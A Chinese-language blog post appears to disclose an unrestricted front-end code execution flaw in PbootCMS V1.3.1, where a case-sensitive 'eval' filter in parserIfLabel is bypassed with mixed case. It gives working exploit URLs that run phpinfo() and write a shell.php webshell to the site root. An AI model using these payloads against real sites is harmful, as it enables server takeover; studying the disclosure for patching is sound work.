Pbootcms-V1.3.1版本前台代码执行(无限制)

发布于 2018,11,21  332 次阅读


版本:PbootCMS V1.3.1 build 2018-11-14

官网:https://www.pbootcms.com/

 

漏洞文件:\apps\home\controller\ParserController.php 中的parserIfLabel函数:


图片1.png


比上个版本的修复方式就是添加了一个:$value == 'eval'判断,但是这个判断是区分大小写的啊,所以直接EVAL就可以绕过了。又可以成功执行代码了。

 

找调用地方:

图片2.png


图片3.png

图片4.png

符合该处正则的模板:\template\default\productlist.html

图片5.png


漏洞利用:

直接访问:http://xxx.com/index.php/list/5/?current={pboot:if(evAl($_GET[a]))}1{/pboot:if}&a=phpinfo();



图片6.png


即可直接造成代码执行。

写入shell Payload:

http://xxx.com/index.php/list/5/?current={pboot:if(evAl($_GET[a]))}1{/pboot:if}&a=file_put_contents('shell.php','<?php%20phpinfo();?>');

即可在根目录成功写入一个shell.php文件。

图片7.png



我的全部野心,就是自由的生活